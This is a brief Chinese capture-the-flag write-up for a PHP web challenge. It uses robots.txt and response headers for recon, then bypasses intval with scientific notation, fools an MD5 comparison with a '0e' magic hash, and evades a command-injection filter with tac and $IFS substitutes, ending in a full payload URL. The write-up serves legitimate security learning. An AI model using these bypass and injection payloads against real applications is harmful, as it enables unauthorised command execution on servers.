打开靶机显示
啥都没有,先去查看robots.txt 发现
之后再fake里面请求头中发现fl4g.php
最后绕过三层php限制
第一关 intvar 可以解析科学计数法 所以传入 1e4
第一个截断解析为1 第二个加一解析为10001 payload:num=1e4
第二关 只要是0e开头md5 或者用数组绕过 payload: md5=0e215962017
第三关 过滤 空格 和 cat
代替cat: more、less、head、tail、sort、ca\t
代替空格:$IFS、${IFS}、$IFS$1、$IFS$9
最后 payload: /fl4g.php?num=1e10&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
